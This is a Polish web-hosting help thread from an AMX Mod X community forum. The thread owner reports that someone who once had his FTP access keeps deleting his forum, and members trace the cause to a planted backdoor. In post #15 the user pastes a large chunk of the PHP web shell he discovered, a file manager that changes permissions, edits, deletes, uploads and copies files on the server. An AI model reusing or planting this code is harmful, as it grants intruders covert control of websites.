Skocz do zawartości

Witamy w Nieoficjalnym polskim support'cie AMX Mod X

Witamy w Nieoficjalnym polskim support'cie AMX Mod X, jak w większości społeczności internetowych musisz się zarejestrować aby móc odpowiadać lub zakładać nowe tematy, ale nie bój się to jest prosty proces w którym wymagamy minimalnych informacji.
  • Rozpoczynaj nowe tematy i odpowiedaj na inne
  • Zapisz się do tematów i for, aby otrzymywać automatyczne uaktualnienia
  • Dodawaj wydarzenia do kalendarza społecznościowego
  • Stwórz swój własny profil i zdobywaj nowych znajomych
  • Zdobywaj nowe doświadczenia

Dołączona grafika Dołączona grafika

Guest Message by DevFuse
 

Zdjęcie

Włamanie i niszczenie forum.


  • Zamknięty Temat jest zamknięty
21 odpowiedzi w tym temacie

#1 Destiny

    Początkujący

  • Użytkownik

Reputacja: 4
Nowy

  • Postów:15
  • GG:
  • Imię:Dawid
  • Lokalizacja:Polska
Offline

Napisano 14.11.2012 11:08

Witam, nie wiedziałem w którym dziale napisać, więc napiszę tutaj, w razie czego proszę o przeniesienie. W skrócie opiszę mój problem :

No więc około 2 miesięcy temu podjąłem współpracę z pewną osobą "X", udostępniłem jej dane do FTP mojej strony. Po jakimś czasie tej osobie zaczęło coś nie pasować i postanowiła, że wyczyści mi zawartość FTP, wcześniej zrobiłem na wszelki wypadek kopię forum, kiedy ją wgrywałem, ta osoba wszystko usuwała, w ten sposób z mojej sieci nic nie zostało, nie mogłem zmienić danych do FTP, ponieważ domena znajdująca się na BiznesHoście należała do mojego znajomego , a ten dopiero kilka dni temu mi ją odsprzedał, (wcześniej z przczyn prywatnych nie było takiej możliwości). Gdy tylko dostałem dane, zmieniłem hasło do hostingu, FTP, DirectAdmiin oraz phpMyAdmin, wgrałem forum od nowa nie minęły24 h a forum znów było skasowane. Nie miałem pojęcia jak to jest możliwe, skanowałem pliki w poszukiwaniu wirusa, usunąłem zapamiętane hasła, pozmieniałem bieżące na bardzo trudne do złamania, wgrałem forum po raz kolejny i znów zostało usunięte. Zauważyłem natomiast, ze zawsze , gdy wgrywam do katalogu głownego folder pod nazwą "forum", to tylko jego zawartość zostaje usuwana, tak jakby robiło się to automatycznie, ale 2 dni temuj w owym folderze zostało kilka plików, a ich nazwy zmienione na np : "hahahaha" i nie mam pojęcia, jak to jest możliwe.

Prosiłem o pomoc także tutaj :

Niestety nie pomogli, choć zrobiliby to za kwotę 199zł, odmówiłem.

Dziś rano hosting przesłał mi logi z ftp, łączy się z nim tylko moje ip, więc nie mam pojęcia jakim sposbem ten delikwent to robi.Jeśli ktoś wie, lub domyśla się jak to jest możliwe, to proszę o pomoc. W wyniku tego incydentu moja sieć upadła i nie potrafię sam sobie z tym poradzić. Nie rozumiem jak można być tak parszywym człowiekiem.
Jeszcze raz bardzo proszę o pomoc i z góry dziękuję.

Użytkownik Destiny edytował ten post 14.11.2012 11:09

  • +
  • -
  • 0

#2 TADEUSZ

    Początkujący

  • Użytkownik

Reputacja: 0
Nowy

  • Postów:11
  • Lokalizacja:Łódź
Offline

Napisano 14.11.2012 11:54

Patrzyłeś czy ta "X" osoba nie założyła sobie oddzielnego konta FTP?

Użytkownik TADEUSZ edytował ten post 14.11.2012 11:55

  • +
  • -
  • 0

#3 sekio

    Wszechwidzący

  • Zbanowany

Reputacja: 32
Życzliwy

  • Postów:270
  • GG:
  • Imię:Sebastian
  • Lokalizacja:lodz
Offline

Napisano 14.11.2012 12:58

Proste zmień hosting najwidoczniej twój znajomy znalazł jakiegoś buga i sobie z niego korzysta , proponuje coś profesjonalnego bo skoro wydałeś 200 zł żeby ci pomogli z tym to raczej 80 zł na unixstromie za rok cie nie zbawi chyba że się mylę.
sebul (14.11.2012 13:48):
"Niestety nie pomogli, choć zrobiliby to za kwotę 199zł, odmówiłem."

http://www.youtube.com/watch?v=T0qmmWiGAho
http://elite-skill.eu/

#4 Destiny

    Początkujący

  • Autor tematu
  • Użytkownik

Reputacja: 4
Nowy

  • Postów:15
  • GG:
  • Imię:Dawid
  • Lokalizacja:Polska
Offline

Napisano 14.11.2012 13:09

Korzystam z BiznesHotsu i uważam,że to dobry hosting.


Patrzyłeś czy ta "X" osoba nie założyła sobie oddzielnego konta FTP?


Co masz dokładnie na myśli? Bo jestem nowicjuszem w tych sprawach. A ta osoba posiadała wcześniej dane tylko do FTP i tym samym MySQL. Nic więcej. Więc nie wiem co mogła zrobić.
  • +
  • -
  • 0

#5 Kawon

    Godlike

  • Przyjaciel

Reputacja: 887
Czempion

  • Postów:5 165
  • Steam:steam
  • Imię:Paweł
  • Lokalizacja:Dzierzgoń
Offline

Napisano 14.11.2012 13:57

W DirecAdminie masz Create Reseller/FTP Zarządzanie są tam konta FTP.
Sprawdź ile jest tych kont. Jeśli jest więcej niż 1 skasuj resztę, jednego skasować nie będziesz mógł bo to jest konto "główne" którego ty używasz.
  • +
  • -
  • 0

DarkGL to mój autorytet.


#6 Destiny

    Początkujący

  • Autor tematu
  • Użytkownik

Reputacja: 4
Nowy

  • Postów:15
  • GG:
  • Imię:Dawid
  • Lokalizacja:Polska
Offline

Napisano 14.11.2012 14:02

Właśnie jest tylko moje konto. Ale gdy np zmieniam dane do bazy danych, a potem wpisuje je w confg_global php to forum nie dziala, tego tez nie rozumiem, działa tylko ze starym hasłem.

Użytkownik Destiny edytował ten post 14.11.2012 14:06

  • +
  • -
  • 0

#7 sharkowy

    Lokalna anomalia sejsmiczna o nieustalonej genezie.

  • Przyjaciel

Reputacja: 113
Zaawansowany

  • Postów:1 981
Offline

Napisano 14.11.2012 14:45

[offtopic]Być może Anonymous wyczuło korupcje na Twoim forum bądź inny przekręt i dlatego nie dają Ci żyć, oni przecież wszystko wyniuchają, ciesz się, że Cię nie DDoS'ują xD[/offtopic]
  • +
  • -
  • 0

#8 Destiny

    Początkujący

  • Autor tematu
  • Użytkownik

Reputacja: 4
Nowy

  • Postów:15
  • GG:
  • Imię:Dawid
  • Lokalizacja:Polska
Offline

Napisano 14.11.2012 14:58

[offtopic]Być może Anonymous wyczuło korupcje na Twoim forum bądź inny przekręt i dlatego nie dają Ci żyć, oni przecież wszystko wyniuchają, ciesz się, że Cię nie DDoS'ują xD[/offtopic]



Napisałem ten temat, w nadziei, ze ktoś kompetentny mi pomoże, nie potrzebuję irracjonalnych wypowiedzi dzieci, więc jeśli nie masz nic sensownego do napisania , to tego nie rób.

Użytkownik Destiny edytował ten post 14.11.2012 14:59

  • +
  • -
  • 1

#9 gslot

    Banned

  • Zbanowany

Reputacja: -1
Nowy

  • Postów:39
  • Lokalizacja:Bydgoszcz
Offline

Napisano 14.11.2012 18:17

Hmm, czytając Twój problem mam zasadnicze pytanie.
Dlaczego nie założyłeś nowej bazy danych do forum?
Powinieneś to zrobić jeżeli Twoje forum jest atakowane.
Polecałbym lekturę forum czy też poradników o DirectAdminie, gdybyś miał pewne wątpliwości.
Po założeniu nowej bazy załóż nowego użytkownika FTP i MYSQL, a stare usuń.
Najlepiej napisz też do UnixStorm o zmiane loginu konta do direct admina, w ten sposób unikniesz również nie przyjemnych konsekwencji włamów.

#10 Destiny

    Początkujący

  • Autor tematu
  • Użytkownik

Reputacja: 4
Nowy

  • Postów:15
  • GG:
  • Imię:Dawid
  • Lokalizacja:Polska
Offline

Napisano 14.11.2012 18:41

No ale ja założyłem nową bazę danych i na niej chciałem postawić od nowa forum a ze starej skopiowalem najważniejsze pliki, wgrałem pliki instalacyjny z IPB ale nie da się zainstalować, jest to możliwe tylko na starej bazie , nie umiem sobie z tym poradzić, a nie ma mi kto pomóc.

@ W ogóle gdy tworzę nową bazę anych w DA i następnie chce się na nią zalogować to nie da się, mogę tylko na tą starą, nie wiem dlaczego.

Użytkownik Destiny edytował ten post 14.11.2012 18:57

  • +
  • -
  • 0

#11 gslot

    Banned

  • Zbanowany

Reputacja: -1
Nowy

  • Postów:39
  • Lokalizacja:Bydgoszcz
Offline

Napisano 14.11.2012 19:04

Nie wiem czy to ma coś wspólnego ale sprawdź na wszelki wypadek Harmonogram Zadań (Cron Tab) i usuń zadania.

#12 Destiny

    Początkujący

  • Autor tematu
  • Użytkownik

Reputacja: 4
Nowy

  • Postów:15
  • GG:
  • Imię:Dawid
  • Lokalizacja:Polska
Offline

Napisano 14.11.2012 19:08

Właśnie nie ma żadnych zadań. Pierwszy raz mam do czynienia z czymś takim, nie jest to normalna sytuacja.

Dostałem właśnie taką wiadomość od hostongu :

Nasz konsultant odpowiedział na Państwa zgłoszenie #882450:

Witam,

Nie ma możliwości zmiany loginu do konta - problemem są zainfekowane pliki na koncie a nie Pana login.



Nie znam się na wirusach, kodowaniu ani innych tego typu rzeczach, więc nie dam rady znaleźć tych zainfekowanych plików.

Użytkownik Destiny edytował ten post 14.11.2012 19:15

  • +
  • -
  • 0

#13 DarkGL

    Nie oddam ciasteczka !

  • Administrator

Reputacja: 6 553
Godlike

  • Postów:11 976
  • GG:
  • Steam:steam
  • Imię:Rafał
  • Lokalizacja:Warszawa
Offline

Napisano 14.11.2012 19:41

W plikach forum twój kolega dodał dla siebie backdoora wgraj pliki z orginalnej wersji skryptu forum
lub http://25yearsofprog...10/20100315.htm

Użytkownik DarkGL edytował ten post 14.11.2012 19:41

  • +
  • -
  • 3

#14 Destiny

    Początkujący

  • Autor tematu
  • Użytkownik

Reputacja: 4
Nowy

  • Postów:15
  • GG:
  • Imię:Dawid
  • Lokalizacja:Polska
Offline

Napisano 15.11.2012 10:05

Dobrze, wgrałem oryginalne pliki, teraz forum mam czyste, jak mam przywrócić starą baze danych? Bo nie chcę by to wszystko przepadło, bez tego ani rusz. Teoretycznie postawiłem forum na tej starej bazie, jednak nic na nim nie ma, nie wiem czemu. Może dlatego, ze wcześniej prefix tabeli to było : "" , a teraz wpisałem : forum, bo nie dało się inaczej. Ale nie wiem co dalej .
  • +
  • -
  • 0

#15 Destiny

    Początkujący

  • Autor tematu
  • Użytkownik

Reputacja: 4
Nowy

  • Postów:15
  • GG:
  • Imię:Dawid
  • Lokalizacja:Polska
Offline

Napisano 15.11.2012 12:46

Znalazłem w plikach coś takiego

$chmodnum2=$_REQUEST['chmodnow'];
chmod($_REQUEST['file2ch'],"0".$chmodnum2);
}
if($_GET['do']=="chmod"){
echo $head.$formg.$nowaddress."<p align=center><b>Chmod</b><br><input size=50 name=file2ch value='".$_REQUEST['address'].$_REQUEST['filename']."'> To <input name=chmodnow size=1 value=777><br><input type=submit value=Set></form>".$end;exit;

}
if($_GET['do']=="edit"){
if($_GET['filename']=="dir"){
if(is_readable($_GET['address'].$_GET['filew'])){
chdir($_GET['address'].$_GET['filew']);}else{echo $deny;exit;}

}}
$araddresss=explode($slash,getcwd());
$matharrayy=count($araddresss)-1;
$addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
for($countback=0;$countback<count($addr1backk);$countback++){
$arraybacke[$countback]=$slash.$addr1backk[$countback];
$backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
}
if ($slash=="\\"){
$countback=null;
$backdirwin=null;
for($countback=1;$countback<count($addr1backk);$countback++){
$backdirwin=$backdirwin."\\".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
}else{
$countback=null;
$backdirwin=null;
for($countback=1;$countback<count($addr1backk);$countback++){
$backdirwin=$backdirwin."/".$addr1backk[$countback];}
$backdirwin=$addr1backk[0].$backdirwin;
$backaddresss=$backdirwin;
var_dump($backaddresss);
$backaddresss=str_replace("\\","/",$backaddresss);
}
function calc_dir_size($path)
{
$size = 0;
if ($handle = opendir($path))
{
while (false !== ($entry = readdir($handle)))
{
$current_path = $path . '/' . $entry;
if ($entry != '.' && $entry != '..' && !is_link($current_path))
{
if (is_file($current_path))
$size += filesize($current_path);
elseif (is_dir($current_path))
$size = calc_dir_size($current_path);
}
}
}
closedir($handle);
return $size;
}
if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
if($cwd==''){$cwd=getcwd();}$nowaddress='<input type=hidden name=address value="'.$cwd.'">';
$ad=getcwd();
$hand=opendir("$ad");
while (false !== ($fileee = readdir($hand))) {
if ($fileee != "." && $fileee != "..") {
if (filetype($fileee)=="dir"){
$fil=$fil.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename=dir&filew='.$fileee.'">'.$fileee.'</span></td>
<td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=chmod&address='.$cwd.$slash.'&filename='.$fileee.'">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Zmień</a></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Usuń</a></td></tr></table>'
;}
else{
$file=$file.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">'.$fileee.'</span></td>
<td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.sizee(filesize($fileee)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=chmod&address='.$cwd.$slash.'&filename='.$fileee.'">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">Edytuj</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Zmień</a></td>
<td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Usuń</a></td></tr></table>'
;}
}
}
echo $head.'
<font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
<tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Lokalizacja : '.$backaddresss.'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
</tr></table>'.$fil.$file.'</table>
<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formg.'Zmień katalog</font></td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().'><input type=submit value="Go"></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt; font-weight:700">Wgraj ---&gt; &nbsp;</td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
<font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee >
<input type=submit value=Wgraj /><br>'.$ifupload.'</form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Chmod ----&gt;</b>&nbsp;&nbsp;Plik : </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><form method=post action=/now2.php><input size=55 name=chmode>&nbsp;&nbsp;Uprawnienia : <input name=chmodnum value=777 size=3> <input type=submit value=" Ok "></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><b>'.$formp.'Stwórz katalog ----&gt;</b> Nazwa katalogu </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt">
<input name=cdirname size=20>'.$nowaddress.' <input type=submit value=" Stwórz "></form></td></tr><tr>
<td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Stwórz plik ----&gt;</b> Nazwa pliku </td>
<td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
<font face="Tahoma" style="font-size: 10pt"><input name=cfilename size=20>'.$nowaddress.' <input type=submit value=" Stwórz "></form></td></tr><tr>
<td width="200" align="right" valign="top">
<font face="Tahoma" style="font-size: 10pt">'.$formp.'<b>Kopiuj ----&gt;</b></b>&nbsp;&nbsp;Plik : </td>
<td width="750"><font face="Tahoma" style="font-size: 10pt">
<input size=40 name=copyname> Do katalogu <input size=40 name=cpyto> <input type=submit value =Kopiuj></form></td></tr></table>
<hr></td></tr></tbody></table></div></td></tr></tbody></table></div></body></html>';



i coś takiego
Spoiler

Użytkownik Destiny edytował ten post 15.11.2012 13:12

  • +
  • -
  • 0

#16 Prizmo*

    Pomocny

  • Zbanowany

Reputacja: 4
Nowy

  • Postów:58
  • GG:
  • Imię:Jakub
  • Lokalizacja:Montville | New Jersey
Offline

Napisano 15.11.2012 12:58

Nowy prefiks=nowa baza
Zrzuc zawartosc tych tabel co ci sa potrzebne np " members, groups,post, topic a reszte od nowa.
Przynajmniej wiesz ze bedziesz mial czyste forum a uprawnienia potem grup sprawdz.
Jak cos gg pomoge ci.

#17 DarkGL

    Nie oddam ciasteczka !

  • Administrator

Reputacja: 6 553
Godlike

  • Postów:11 976
  • GG:
  • Steam:steam
  • Imię:Rafał
  • Lokalizacja:Warszawa
Offline

Napisano 15.11.2012 15:36

skoro nazwy tabel w backupie mają inne nazwy niż używane przez skrypt to je po prostu pozmieniaj
  • +
  • -
  • 0

#18 gslot

    Banned

  • Zbanowany

Reputacja: -1
Nowy

  • Postów:39
  • Lokalizacja:Bydgoszcz
Offline

Napisano 15.11.2012 19:31

Proponowałbym wgrać IPB od nowa bez instalacji (same pliki) potem do conf_global wpisac dane bazy z starym prefixem

#19 Destiny

    Początkujący

  • Autor tematu
  • Użytkownik

Reputacja: 4
Nowy

  • Postów:15
  • GG:
  • Imię:Dawid
  • Lokalizacja:Polska
Offline

Napisano 15.11.2012 19:44

Nie działa.


Zrobiłem nawet nową baze danych, wgrałem do niej pliki ze starej, wgrałem plik z instalacją IPB, odpaliłem, wpisałem dane do bazy , nie a się zainstalować.


Warning: Access denied for user 'virt5913_1'@'91.228.196.224' (using password: YES)



A wpisuję hasło poprawnie, to nie działa. No już nie mam sił do tego

Użytkownik Destiny edytował ten post 15.11.2012 19:48

  • +
  • -
  • 0

#20 Kawon

    Godlike

  • Przyjaciel

Reputacja: 887
Czempion

  • Postów:5 165
  • Steam:steam
  • Imię:Paweł
  • Lokalizacja:Dzierzgoń
Offline

Napisano 15.11.2012 19:52

Warning: Access denied for user 'virt5913_1'@'91.228.196.224' (using password: YES)

[MySQL] Nadawanie dostępu do bazy z zewnątrz
  • +
  • -
  • 1

DarkGL to mój autorytet.





Użytkownicy przeglądający ten temat: 0

0 użytkowników, 0 gości, 0 anonimowych